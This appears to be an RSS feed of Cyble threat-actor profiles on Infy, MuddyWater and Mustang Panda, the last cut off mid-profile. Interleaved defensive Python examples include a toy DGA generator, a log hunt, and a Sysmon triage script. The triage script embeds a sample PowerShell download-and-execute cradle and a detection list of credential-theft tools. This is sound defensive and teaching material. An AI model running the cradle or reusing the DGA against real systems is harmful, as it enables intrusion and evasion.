Cyble https://cyble.com Cyble: AI-based Cyber Threat Intelligence Platform. Stay ahead of cyber threats with real-time insights & monitoring with the best cybersecurity solutions! Tue, 13 Jan 2026 13:20:52 +0000 en-US contact@cyble.com Cyble Inc. All Rights Reserved

Threat Actor Profile: Infy https://cyble.com/threat-actor-profiles/infy/ Tue, 13 Jan 2026 13:20:01 +0000 https://cyble.com/?post_type=threat_actor&p=109432

Overview 

Infy is a state-sponsored advanced persistent threat (APT) group assessed to be of Iranian origin, with activity patterns and targeting that strongly suggest alignment with Iranian state interests. The group has been active since at least 2015, with its operations becoming publicly identifiable by 2016. Infy is also tracked under several alternative designations, including Prince of Persia, APT-C-07, and Operation Mermaid. 

Since its emergence, Infy has demonstrated a clear focus on cyber espionage, particularly against human rights activists, dissident communities, and government-related entities. While its activity levels have fluctuated, the group has shown persistence, continued tooling development, and a sustained interest in Iranian civil society targets even after periods of reduced operational tempo. 

Historical Context and Activity Timeline 

Infy’s earliest known campaigns date back to 2015, when the group began targeting Iranian human rights activists using early iterations of its custom malware.  

Infy operation timeline (Source: Cyble) 

Activity intensified significantly in early 2016, coinciding with Iran’s February 2016 parliamentary elections. During this period, Infy conducted a concentrated set of operations aimed at surveillance, information theft, and monitoring of individuals perceived as politically sensitive or oppositional to the regime. 

Following the 2016 elections, Infy’s observable activity declined but did not cease. Telemetry data and continued detection of infrastructure and malware variants indicate that the group maintained ongoing, low-volume attack attempts against Iranian civil society and related targets.  

Geographic Origin and Targeting Scope 

Origin of Infy (Source: Cyble Vision) 

Infy is assessed to operate from Iran, within the broader Middle East and Africa (MEA) region.  

Countries/regions targeted by Infy (Source: Cyble) 

However, its targeting is global in scope. Confirmed or reported victim countries include: 

  • Azerbaijan 

  • Bahrain 

  • Canada 

  • China 

  • Denmark 

  • France 

  • Germany 

  • India 

  • Iran 

  • Iraq 

  • Israel 

  • Italy 

  • Netherlands 

  • Romania 

  • Russia 

  • Saudi Arabia 

  • Sweden 

  • Syria 

  • Turkey 

  • United Kingdom 

  • United States 

The diversity of targeted countries suggests that Infy’s operations extend beyond pure domestic surveillance and include intelligence collection against foreign governments, international organizations, and diaspora communities. 

Targeted Sectors 

Infy’s operations primarily focus on: 

  • Government entities 

  • Law enforcement agencies (LEA) 

  • Civil society organizations 

  • Human rights activists and advocacy groups 

This targeting profile reinforces the assessment that Infy’s mission centers on political surveillance and intelligence collection, rather than financial crime or disruptive cyber operations. 

Malware Arsenal and Tooling Overview 

Infy’s operations rely on a limited but purpose-built malware ecosystem. Cyble Vision tracks two primary families, Infy and Tonnerre; more recent activity has also featured the closely related Foudre family, covered under tooling evolution below. 

Malware families used by Infy (Source: Cyble Vision) 

Despite the relatively small number of tools, the group has demonstrated iterative development, modular design, and increasing technical sophistication over time. 

Malware Families Used by Infy  

Infy (Reconnaissance Agent) 

The Infy malware family is primarily used for initial reconnaissance and system profiling. Early versions exhibited design flaws that allowed researchers to track infections through telemetry data, contributing to the group’s exposure. Despite these shortcomings, the malware enabled the collection of host information and served as a foundation for subsequent tooling evolution. 

Tonnerre (Backdoor and Surveillance Tool) 

Tonnerre represents Infy’s more advanced and multifunctional malware family. It is a Delphi-based backdoor composed of five distinct forms, each responsible for a specific operational capability: 

  1. Installation and upgrade mechanisms, enabling persistence and malware lifecycle management. 

  2. File collection modules, targeting predefined directories for data harvesting. 

  3. FTP-based communication, allowing command retrieval and data exfiltration. 

  4. Removable media harvesting, enabling the collection of files from external storage devices. 

  5. Audio recording functionality, using the LAME command-line MP3 encoder (lame) to capture sound for surveillance purposes. 

Evolution of Tooling and Tradecraft 

Over time, Infy’s tooling evolved from basic document-delivered implants into multi-stage malware frameworks incorporating: 

  • Custom loaders 

  • Domain Generation Algorithms (DGAs) 

  • Layered command-and-control (C2) architectures 

  • Adaptive data exfiltration mechanisms 

This progression reflects a deliberate effort to enhance operational resilience, evade detection, and maintain persistent access to high-value targets. 

More recent activity has prominently featured the Foudre malware family, particularly its later variants. Foudre is typically delivered via malicious Microsoft Excel documents containing embedded self-extracting executables. These lures are specifically designed to bypass traditional macro-based detection mechanisms and rely on user execution rather than automatic macro triggers. 

Infection Chain and Command-and-Control Architecture 

Once executed, Foudre initiates communication with attacker-controlled infrastructure using structured HTTP GET requests. These requests transmit detailed host metadata, including: 

  • Unique system identifiers 

  • Usernames 

  • Hostnames 

  • Internal malware versioning values 

This information allows operators to inventory infected systems, assess victim relevance, and determine appropriate follow-on actions. 

Foudre’s command-and-control infrastructure is notably organized. Distinct server-side directories are used for: 

  • Host validation 

  • Command retrieval 

  • Data exfiltration 

In multiple observed cases, directory naming conventions suggest victim segmentation, including language-specific paths. This implies that infected systems are categorized based on geographic or linguistic attributes, indicating active human operator oversight rather than indiscriminate automation. Such a structure strongly supports the assessment that Infy’s campaigns are intelligence-driven, with selective targeting and tasking. 
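To make the structure above concrete, here is an added example (not Cyble's code, and not Foudre's real traffic or URL layout) that hunts a proxy log for GET requests whose query strings carry host identifiers, usernames, hostnames or version values, and then lists the top-level directories each destination serves them under. The log lines, parameter names and directory names (including the `fa` language path) are constructed for the example; the PARAM_CATEGORIES table is an assumption to be seeded from real samples.

```python
"""Added example, not Cyble's or Foudre's code: hunt proxy logs for check-in
style GET requests that carry host metadata in the query string, then
summarise the server-side directory layout each destination exposes."""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Assumed parameter names per metadata category; real implants pick their own,
# so seed these from samples rather than trusting the defaults.
PARAM_CATEGORIES = {
    "identifier": {"id", "uid", "guid", "sid"},
    "username": {"u", "user", "username", "un"},
    "hostname": {"h", "host", "hostname", "pc", "cn"},
    "version": {"v", "ver", "version"},
}

# Constructed proxy log, not real Foudre traffic: "<ts> <client> <method> <url> <status>".
# Directory names are illustrative; "fa" stands in for a language-specific victim path.
PROXY_LOG = """\
2026-01-13T09:00:01Z 10.0.0.7 GET http://cdn.example.net/static/app.js 200
2026-01-13T09:00:05Z 10.0.0.7 GET http://c2.example.invalid/check/index.php?id=4f2a9c&u=jdoe&h=WS-JDOE-01&v=21 200
2026-01-13T09:00:35Z 10.0.0.7 GET http://c2.example.invalid/cmd/fa/index.php?id=4f2a9c&h=WS-JDOE-01 200
2026-01-13T09:01:10Z 10.0.0.7 GET http://c2.example.invalid/up/fa/index.php?id=4f2a9c&h=WS-JDOE-01&d=UEsDBBQ 200
2026-01-13T09:01:12Z 10.0.0.9 GET http://search.example.com/?q=quarterly+report&hl=en 200
2026-01-13T09:01:40Z 10.0.0.9 GET http://news.example.com/article?id=1234 200
2026-01-13T09:02:05Z 10.0.0.12 GET http://c2.example.invalid/check/index.php?id=9b01ee&u=asmith&h=WS-ASMITH&v=21 200
"""


def metadata_categories(url: str) -> set:
    """Which host-metadata categories appear among the query parameter names."""
    keys = {k.lower() for k in parse_qs(urlsplit(url).query, keep_blank_values=True)}
    return {cat for cat, names in PARAM_CATEGORIES.items() if keys & names}


def first_directory(url: str) -> str:
    """Top-level server-side directory of the request path ("/" if none)."""
    parts = [p for p in urlsplit(url).path.split("/") if p]
    return parts[0] if parts else "/"


def hunt(lines, min_categories: int = 2) -> dict:
    """Group check-in-looking GETs by destination host. A host that receives
    metadata-bearing requests under several distinct top-level directories
    (validate / command / upload) is worth pulling full request bodies for."""
    per_host = defaultdict(lambda: {"beacons": 0, "dirs": set(), "clients": set()})
    for line in lines:
        if not line.strip():
            continue
        _ts, client, method, url, _status = line.split()
        # One parameter such as a plain article id is below the threshold on purpose.
        if method != "GET" or len(metadata_categories(url)) < min_categories:
            continue
        host = urlsplit(url).hostname or "?"
        per_host[host]["beacons"] += 1
        per_host[host]["dirs"].add(first_directory(url))
        per_host[host]["clients"].add(client)
    return {h: {"beacons": v["beacons"], "dirs": sorted(v["dirs"]), "clients": sorted(v["clients"])}
            for h, v in per_host.items()}


if __name__ == "__main__":
    for host, summary in hunt(PROXY_LOG.splitlines()).items():
        print(host, summary)
```

A destination that takes metadata-bearing requests under two or three separate directories from more than one internal client is a far stronger lead than any single request, and the directory set is what you would then map against the validation/command/exfiltration roles described above.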

Secondary Payload Deployment and Persistence 

After establishing initial access via Foudre, Infy frequently deploys Tonnerre as a secondary payload to expand functionality and persistence. While Tonnerre shares architectural similarities with Foudre, it introduces its own domain generation logic and command-handling routines. 

The use of DGAs allows the malware to dynamically generate large numbers of candidate domains for command-and-control communication. This capability complicates network-based blocking, enables rapid infrastructure rotation, and reduces reliance on static indicators. The generated domains are often short-lived and distributed across multiple hosting environments, further degrading the effectiveness of signature-based defenses. 
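As an added illustration (not Cyble's code, and not the generation logic Tonnerre or Foudre actually use), the block below pairs a toy seeded DGA with the kind of coarse DNS-log hunt defenders run against one. The seed, date scheme, TLD list, allowlist and resolver log lines are all constructed, and the detection thresholds are assumptions to be tuned on your own resolver data.

```python
"""Added example, not code from Cyble or from the Infy toolset: a toy seeded
DGA next to a coarse DGA hunt over constructed DNS resolver log lines."""
import hashlib
import math
from collections import Counter, defaultdict
from datetime import date

TLDS = ("com", "net", "org")                                  # assumption: toy TLD rotation
ALLOWLIST = {"microsoft.com", "example.com", "example.org"}  # assumption: known-good domains


def toy_dga(seed: str, day: date, count: int = 5) -> list:
    """Derive `count` candidate C2 domains from a shared secret plus the date.
    Generic hash-based construction; NOT the real Tonnerre/Foudre algorithm."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day.isoformat()}|{i}".encode()).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])  # 12 lowercase letters
        domains.append(f"{label}.{TLDS[digest[12] % len(TLDS)]}")
    return domains


def demo_domains() -> list:
    """Candidate list for a fixed seed and date so the output is reproducible."""
    return toy_dga("shared-secret", date(2026, 1, 13))


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def registrable(domain: str) -> str:
    """Crude registrable-domain extraction (assumes single-label TLDs)."""
    parts = domain.lower().strip(".").split(".")
    return ".".join(parts[-2:])


def looks_like_dga(domain: str) -> bool:
    """Heuristic: long label with high character entropy AND few vowels.
    Either signal alone misfires on hyphenated English names."""
    reg = registrable(domain)
    if reg in ALLOWLIST:
        return False
    label = reg.split(".")[0]
    if len(label) < 10:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= 3.0 and vowel_ratio <= 0.25


# Constructed resolver log: "<timestamp> <client_ip> <qname> <rcode>".
DNS_LOG = """\
2026-01-13T10:00:01Z 10.0.0.5 qzxvkwrtpbnm.com NXDOMAIN
2026-01-13T10:00:02Z 10.0.0.5 hjdpqtrkxzvw.net NXDOMAIN
2026-01-13T10:00:03Z 10.0.0.5 xtrmbvqzkdwp.org NOERROR
2026-01-13T10:00:04Z 10.0.0.5 www.microsoft.com NOERROR
2026-01-13T10:00:05Z 10.0.0.8 mail.example.com NOERROR
2026-01-13T10:00:06Z 10.0.0.8 accounts.internal-portal.net NOERROR
"""


def hunt_dns_log(lines) -> dict:
    """Per client: distinct DGA-looking names and how many of them came back
    NXDOMAIN. A client burning through random-looking names that mostly do
    not resolve is the DGA tell; one odd lookup is not."""
    stats = defaultdict(lambda: {"dga_like": set(), "nxdomain": 0})
    for line in lines:
        if not line.strip():
            continue
        _ts, client, qname, rcode = line.split()
        if looks_like_dga(qname):
            stats[client]["dga_like"].add(qname.lower())
            if rcode == "NXDOMAIN":
                stats[client]["nxdomain"] += 1
    return {c: {"dga_like": sorted(v["dga_like"]), "nxdomain": v["nxdomain"]}
            for c, v in stats.items() if v["dga_like"]}


if __name__ == "__main__":
    print("today's candidates:", demo_domains())
    print("hunt:", hunt_dns_log(DNS_LOG.splitlines()))
```

The generator shows why blocklists lag: both sides derive the same daily candidates from a secret and the date, so the operator only has to register one of them. The hunt leans on two weak signals together, high character entropy and a low vowel ratio on a long label, because entropy alone also trips on hyphenated English names such as internal-portal; the per-client NXDOMAIN count is the corroborating tell, since most of the candidates a DGA tries are never registered.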

Command-and-Control Channels 

Infy’s malware has leveraged multiple communication mechanisms over time, including web-based protocols and modern platforms such as Telegram for command-and-control. The use of widely adopted services enables the group to blend malicious traffic into normal network activity, reducing the likelihood of detection through conventional filtering. 

Exfiltration is commonly conducted over existing C2 channels, with stolen data encoded into standard command-and-control communications rather than using separate data transfer mechanisms. 

Infy’s Observed Tradecraft 

Infy’s operations rely on a combination of stealthy and adaptive techniques. The group exploits built-in system functions to execute processes and carry out tasks while also using malicious documents or executables delivered through phishing to gain access.  

They gather detailed information about systems and configurations to plan follow-on actions and exfiltrate sensitive data through established communication channels. To avoid detection, Infy blends its communications with normal web traffic and frequently changes the domains it uses to control compromised systems, making its operations difficult to block or disrupt. 

Conclusion 

Infy is a state-aligned espionage actor focused on political surveillance, using a small but precise malware toolkit, structured infrastructure, and evolving tradecraft to sustain deliberate campaigns against Iranian civil society and sensitive organizations. Cyble’s AI-powered monitoring highlights Infy as a persistent, technically advanced cyber threat, and organizations can strengthen their cyber resilience by leveraging Cyble’s real-time threat intelligence and dark web visibility.  

Cyble Threat Actor Library (Source: Cyble Vision) 

Book a free demo today or check out how our external threat assessment report maps out against your stack! 

Recommendation and Mitigation Strategies 

  • Enhance Phishing Defenses: Implement advanced email filtering, user awareness training, and simulated phishing exercises to reduce the risk of initial malware delivery. 

  • Monitor for Unusual System Behavior: Use endpoint detection tools to flag abnormal process execution, unauthorized data access, and unexpected network communications. 

  • Segment Critical Systems: Isolate sensitive assets and civil society-related systems from general networks to limit lateral movement in case of compromise. 

  • Track External Dependencies: Maintain visibility into third-party services, cloud platforms, and communication channels that could be exploited for command-and-control or data exfiltration. 

  • Deploy Threat Intelligence: Integrate real-time monitoring of malware campaigns, emerging threat actors, and dark web activity, leveraging AI-powered platforms like Cyble for proactive detection. 

  • Maintain Backup and Recovery Plans: Regularly test offline and secure backups, and document restoration sequencing to ensure business continuity in prolonged incidents. 

  • Enforce Multi-Factor Authentication and Identity Controls: Protect access to critical systems and cloud accounts to prevent attackers from leveraging stolen credentials. 

MITRE ATT&CK Techniques Associated with Infy 

MITRE ATT&CK Techniques (Source: Cyble Vision)   

  • Native API Execution (T1106): Infy abuses built-in operating system interfaces to execute processes, interact with low-level system services, and carry out actions while blending into normal system activity and avoiding detection. 

  • Malicious File Execution (T1204.002): The group relies on social engineering to trick victims into opening malicious documents or executables, often delivered via phishing emails or placed where users are likely to interact with them. 

  • System Information Discovery (T1082): Infy collects detailed information about operating systems, hardware, and configurations to assess victim environments and tailor follow-on actions. 

  • Exfiltration Over Command-and-Control Channel (T1041): Stolen data is transmitted through existing command-and-control communications, allowing exfiltration to occur without establishing separate data transfer channels. 

  • Web-Based Command and Control (T1071.001): The group uses common web protocols to blend malicious communications with legitimate network traffic and evade network-based detection. 

  • Domain Generation Algorithms (T1568.002): Infy dynamically generates command-and-control domains to rotate infrastructure, evade blocking, and maintain resilient access to compromised systems. 

Disclaimer: This profile is based on OSINT, Cyble research, and external sources. Cyble is not responsible for the accuracy of the data or any misuse of the information presented. 

The post Threat Actor Profile: Infy   appeared first on Cyble.

Threat Actor Profile: MuddyWater  https://cyble.com/threat-actor-profiles/muddywater-apt/ Tue, 06 Jan 2026 12:58:07 +0000 https://cyble.com/?post_type=threat_actor&p=108928 MuddyWater 

Overview 

MuddyWater is an Advanced Persistent Threat (APT) group widely believed to have originated in Iran and is commonly linked to interests associated with the Islamic Revolutionary Guard Corps (IRGC). First publicly reported in 2017, the group has maintained a consistent presence in cyber-espionage operations targeting a variety of industries and government organizations.  

Unlike typical cybercriminal operations, MuddyWater is not financially motivated. Instead, the group focuses on strategic intelligence collection, maintaining a low profile while conducting operations across multiple regions and sectors. Its campaigns are characterized by stealth, persistence, and the use of legitimate tools and operating system features, which allow it to blend into normal network activity and evade detection. 

Who is MuddyWater? 

MuddyWater is primarily an espionage-focused APT group, specializing in covert intelligence operations rather than disruptive attacks or financial gain. Its operators rely heavily on low-visibility tactics, often leveraging native system functionalities and widely available administrative tools rather than deploying custom malware. This approach minimizes the risk of detection while allowing long-term access to targeted environments. 

MuddyWater Overview (Source: Cyble)

The group has repeatedly demonstrated technically advanced techniques for compromising third-party organizations, including spearphishing campaigns and exploiting public-facing application vulnerabilities. These operations are designed to harvest sensitive information, maintain persistence, and map critical networks over time. 

While MuddyWater is widely assessed as state-aligned, particularly with Iranian strategic objectives, some ambiguity remains regarding the level of direct state control. Analysts suggest that the group may operate through a mix of formal state resources and contracted operators, giving it flexibility in execution while maintaining plausible deniability.  

Alias Mapping for MuddyWater Group 

The following list presents aliases associated with the MuddyWater group, helping analysts and researchers track their activity and campaigns across different targets.

MuddyWater Aliases (Source: Cyble)

Origin and Geographic Scope 

Cyble Vision Threat Library (Source: Cyble Vision)  

MuddyWater’s activity is strongly concentrated in the Middle East, with additional operations observed across Europe, Africa, and parts of Asia and North America. The group demonstrates a regional priority aligned with Iranian geopolitical interests while maintaining the capability to operate globally. 

Confirmed or reported target countries include the United Arab Emirates, Saudi Arabia, Iraq, Israel, Jordan, Kuwait, Qatar, Bahrain, Egypt, Sudan, Tunisia, Turkey, Afghanistan, Armenia, Azerbaijan, Georgia, Tajikistan, Laos, Thailand, India, Russia, Ukraine, Belarus, Austria, Norway, Portugal, the United States, Tanzania, Mali, the Northern Mariana Islands, and Iran itself. 

This geographic spread indicates both regional intelligence collection and opportunistic expansion beyond immediate neighboring states. 

Targeted Sectors 

MuddyWater targets a wide range of industries, reflecting an interest in political, economic, military, and infrastructure-related intelligence. 

Sectors Targeted by MuddyWater (Source: Cyble) 

The diversity of sectors suggests that MuddyWater collects intelligence not only for immediate strategic value but also for long-term situational awareness across political, economic, and societal domains. 

Initial Access and Infection Chains 

MuddyWater commonly gains initial access through spearphishing campaigns, exploiting both malicious attachments and embedded links. The group has demonstrated a consistent ability to compromise third-party organizations and reuse legitimate email accounts to distribute phishing messages, increasing credibility and success rates. 

In addition to phishing, MuddyWater has exploited public-facing application vulnerabilities, including Microsoft Exchange memory corruption flaws, and has historically abused CVE-2017-0199, an Office vulnerability enabling remote code execution via malicious documents. 

Once a victim interacts with a lure document or link, the infection chain typically delivers a lightweight loader or script-based payload that establishes an initial foothold and prepares the system for follow-on activity. 

Malware Ecosystem 

Malware Families Used by MuddyWater (Source: Cyble Vision)    

MuddyWater maintains a large malware arsenal, with at least 40 identified families spanning backdoors, loaders, reconnaissance tools, and credential stealers. 

Key Malware Families 

  • UDPGangster: A UDP-based backdoor delivered through macro-enabled Word documents. UDPGangster supports remote command execution, file extraction, and staged payload delivery while incorporating extensive anti-analysis checks to evade sandbox environments. 

  • Fooder: A newly identified 64-bit C/C++ loader that represents a notable evolution in MuddyWater’s tooling. Fooder decrypts and reflectively loads embedded payloads, most commonly MuddyViper, entirely in memory, reducing forensic artifacts and bypassing file-based detection mechanisms. 

  • MuddyViper: A previously undocumented C/C++ backdoor used as a second-stage payload. Loaded via Fooder, MuddyViper operates fully in memory and supports command execution, file upload and download, credential harvesting, and browser data collection. 

  • Phoenix v4: A MuddyWater-linked backdoor delivered using a FakeUpdate loader. Phoenix v4 supports remote shell execution, file transfers, and process injection, using in-memory AES decryption for stealth and evasion. 

  • Chromium_Stealer: A credential-stealing malware that targets Chromium-based browsers, harvesting stored passwords, cookies, and session data for exfiltration to command-and-control infrastructure. 

Abuse of Legitimate Tools 

MuddyWater frequently repurposes legitimate administrative and reconnaissance utilities. Tools such as ChromeCookiesView, CrackMapExec, Mimikatz, LaZagne, PowerSploit, Meterpreter, ScreenConnect, and RemoteUtilities are leveraged for credential theft, lateral movement, network mapping, and persistence. 

For example, ChromeCookiesView, originally designed as a legitimate browser utility, can be abused to extract session cookies and authentication tokens, enabling unauthorized access to victim accounts without needing plaintext credentials. CrackMapExec is used to enumerate Active Directory environments and facilitate lateral movement across enterprise networks. 

Attack Techniques Observed 

MuddyWater employs a wide range of operational methods to gain initial access to targeted environments. The group frequently takes advantage of weaknesses in internet-facing systems, allowing them to enter networks without direct user interaction.  

In many cases, they rely on carefully crafted phishing campaigns, sending emails that contain either malicious attachments or deceptive links. These messages are often designed to appear legitimate and are tailored to the intended recipient, increasing the likelihood that the content will be opened and trusted. 

Once access is established, MuddyWater uses several execution methods that blend into normal system activity. The group commonly relies on built-in management features and scheduling functions within operating systems to run their tools and maintain access over time.  

Scripting languages and command-line interfaces are heavily used, enabling the attackers to execute commands, deploy additional components, and adapt their actions dynamically without leaving obvious traces. 

MuddyWater also exploits weaknesses in client applications and encourages users to interact with malicious files or web content. By doing so, the group can trigger the execution of harmful code under the guise of legitimate activity.  

These approaches allow MuddyWater to move within networks quietly, maintain persistence, and expand access while avoiding detection mechanisms that are designed to identify more overt or noisy forms of malware. 

Conclusion 

As of late 2025, MuddyWater continues to operate as a persistent and capable espionage-focused threat actor, demonstrating a sustained emphasis on stealth, long-term access, and disciplined operational security. The group’s consistent use of covert techniques, reliance on trusted system components, and steady evolution of its tooling reinforce its role as a strategic intelligence collection actor rather than a short-lived cybercriminal entity.  

Its wide geographic reach and continued focus on government, energy, and telecommunications organizations, particularly across the Middle East, mean that affected sectors remain at elevated risk from ongoing and future campaigns. Against this backdrop, intelligence-driven visibility is critical. 

Cyble Threat Actor Library (Source: Cyble Vision)

Through its threat research and AI-powered intelligence capabilities, Cyble helps organizations track actors like MuddyWater, understand new tactics, and respond proactively to cybersecurity risks. Security teams seeking deeper insight into state-aligned threats and improved preparedness can explore Cyble’s threat intelligence capabilities by scheduling a demo or requesting an external threat assessment report. 

Recommendation and Mitigation Strategies 

  • Enhance Email Security: Use advanced phishing detection and regularly train employees to recognize malicious emails, especially those appearing to come from trusted sources. 

  • Secure Public-Facing Systems: Promptly patch and harden internet-facing applications to reduce the risk of exploitation. 

  • Control Script and Tool Usage: Restrict and monitor the use of scripting engines and built-in administrative tools commonly abused for stealthy execution. 

  • Strengthen Endpoint Monitoring: Deploy behavior-based endpoint detection to identify abnormal activity and misuse of legitimate tools. 

  • Limit Privileged Access: Apply least-privilege principles and strong authentication to reduce the impact of credential compromise. 

  • Monitor Internal Network Activity: Watch for signs of lateral movement, credential abuse, and unauthorized system discovery. 

  • Leverage Threat Intelligence: Use current threat intelligence to track evolving MuddyWater tactics and adjust defenses proactively. 

MITRE ATT&CK Techniques Associated with MuddyWater 

MITRE ATT&CK Techniques (Source: Cyble Vision)  

  • Exploit Public-Facing Application (T1190): MuddyWater has exploited vulnerabilities in internet-facing systems, including a Microsoft Exchange memory corruption flaw, to gain initial access without direct user interaction. 

  • Spearphishing Attachment (T1566.001): The group has compromised third-party organizations and abused legitimate email accounts to send spearphishing messages containing targeted malicious attachments. 

  • Spearphishing Link (T1566.002): MuddyWater has distributed targeted phishing emails with embedded malicious links designed to lure victims into interacting with harmful content. 

  • Windows Management Instrumentation (T1047): MuddyWater has leveraged WMI through its malware to execute payloads and collect host-level information while blending into normal system activity. 

  • Scheduled Task (T1053.005): The group has created scheduled tasks to maintain persistence and ensure the continued execution of its tools within compromised environments. 

  • PowerShell (T1059.001): MuddyWater has extensively used PowerShell to execute commands, download payloads, and manage post-compromise activity. 

  • Windows Command Shell (T1059.003): The threat actor has used custom tooling to establish reverse shells and execute commands through the Windows command-line interface. 
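The execution techniques listed above, together with the dual-use tools described under Abuse of Legitimate Tools, are easiest to triage from process-creation telemetry. The block below is an added example (not MuddyWater tooling and not Cyble code) that applies four simple rules to constructed Sysmon Event ID 1 style records. The binary names in DUAL_USE_TOOLS, the user-writable path patterns, the sample command lines and the 203.0.113.10 download address are assumptions made for the example.

```python
"""Added example, not MuddyWater tooling or Cyble code: rule-based triage of
constructed Sysmon-style process-creation records for behaviours the profile
lists: dual-use tool execution, scheduled tasks that run from user-writable
paths, encoded or hidden PowerShell, and shells spawned through WMI."""
import base64
import ntpath
import re

# Assumed binary names for the dual-use tools the profile names.
DUAL_USE_TOOLS = {"mimikatz.exe", "lazagne.exe", "chromecookiesview.exe",
                  "crackmapexec.exe", "cme.exe", "screenconnect.clientservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
          "cscript.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\", re.I)
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"[-/]w(?:indowstyle)?\s+hidden", re.I)

# Constructed download cradle; 203.0.113.0/24 is a documentation address range.
PLAINTEXT_PS = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script; used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -enc/-EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed events using Sysmon Event ID 1 field names (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 15 /tn "OfficeUpdater" '
                    r'/tr "C:\Users\jdoe\AppData\Roaming\upd\run.vbs" /f'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(PLAINTEXT_PS)},
    {"Image": r"C:\Users\Public\tools\ChromeCookiesView.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"ChromeCookiesView.exe /stext C:\Users\Public\tools\cookies.txt"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]


def analyze(events) -> list:
    """Return (event_index, technique, detail) findings; benign events yield none."""
    findings = []
    for i, ev in enumerate(events):
        image = ntpath.basename(ev["Image"]).lower()
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        cmd = ev.get("CommandLine", "")
        if image in DUAL_USE_TOOLS:
            findings.append((i, "dual-use-tool", image))
        if image == "schtasks.exe" and "/create" in cmd.lower():
            m = re.search(r'/tr\s+"?([^"]+)', cmd, re.I)   # the task action
            target = m.group(1).strip() if m else ""
            if USER_WRITABLE.search(target):
                findings.append((i, "T1053.005", f"task action runs {target}"))
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append((i, "T1059.001", f"encoded command decodes to: {decoded}"))
            elif HIDDEN_FLAG.search(cmd) or "downloadstring" in cmd.lower():
                findings.append((i, "T1059.001", "hidden window or download cradle"))
        if parent == "wmiprvse.exe" and image in SHELLS:
            findings.append((i, "T1047", f"{image} spawned by WmiPrvSE.exe"))
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The one piece worth lifting verbatim is decode_encoded_command: -EncodedCommand takes base64 of the UTF-16LE script, so a UTF-8 decode of the payload yields interleaved NUL bytes and is routinely mis-read. Parent/child pairing (WmiPrvSE.exe spawning a shell) is what separates T1047 from ordinary scripted administration, which is why the last, benign PowerShell event produces no finding.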

Threat Actor Profile: Mustang Panda https://cyble.com/threat-actor-profiles/mustang-panda/ Tue, 09 Dec 2025 13:44:18 +0000 https://cyble.com/?post_type=threat_actor&p=107827 Mustang Panda

Mustang Panda, also known across security reporting as Bronze President, Camaro Dragon, CeranaKeeper, Earth Preta, HoneyMyte, PKPLUG, Red Lich, Stately Taurus, and TEMP.Hex, is one of the most active and persistent China-based espionage groups operating in 2025.  

Intelligence assessments consistently associate the group with state-directed objectives, primarily focused on political, governmental, and strategic sectors. While Mustang Panda operates worldwide, long-term monitoring reveals a disproportionately heavy focus on Mongolia, alongside extensive activity targeting the Asia-Pacific, Europe, Africa, and North America. 

Overview and Strategic Objectives 

The group’s operations follow a consistent pattern centered on intelligence collection, long-term access, and exploitation of high-value organizations. Mustang Panda frequently relies on spearphishing to deliver customized malware families such as PlugX and Poison Ivy, using these tools to establish footholds inside targeted systems before expanding laterally. 

Typical operations begin with a tailored email containing either a malicious attachment or a link directing the victim to an archive hosted on platforms such as Google Drive or Dropbox. These delivery mechanisms often carry legitimate-looking executable files paired with malicious DLLs designed to load stealthy backdoors or reconnaissance modules. 

Geographic Focus and Primary Sectors of Interest 

Cyble Vision Threat Library (Source: Cyble Vision)   

 Mustang Panda targets a wide array of countries. Confirmed victimology includes entities in Australia, Bangladesh, Belgium, Bulgaria, China, Cyprus, Czech Republic, Germany, Ethiopia, France, the United Kingdom, Greece, Hong Kong, Hungary, Indonesia, India, Japan, South Korea, Myanmar, Mongolia, Nepal, the Philippines, Pakistan, Russia, Sweden, Singapore, Slovakia, South Sudan, Thailand, Taiwan, the United States, Vietnam, and South Africa. 

The threat actor focuses on organizations that provide geopolitical, military, or sensitive internal information. Documented targeted sectors include: 

  • Aerospace and Defense 

  • Education 

  • Government and Law Enforcement Agencies 

  • Healthcare 

  • Telecommunications 

These industries align with long-term intelligence collection goals, including monitoring political developments, assessing foreign defense postures, and gathering sensitive research or communications. 

Operational Toolset 

   Malware Families Used by Mustang Panda (Source: Cyble Vision)   

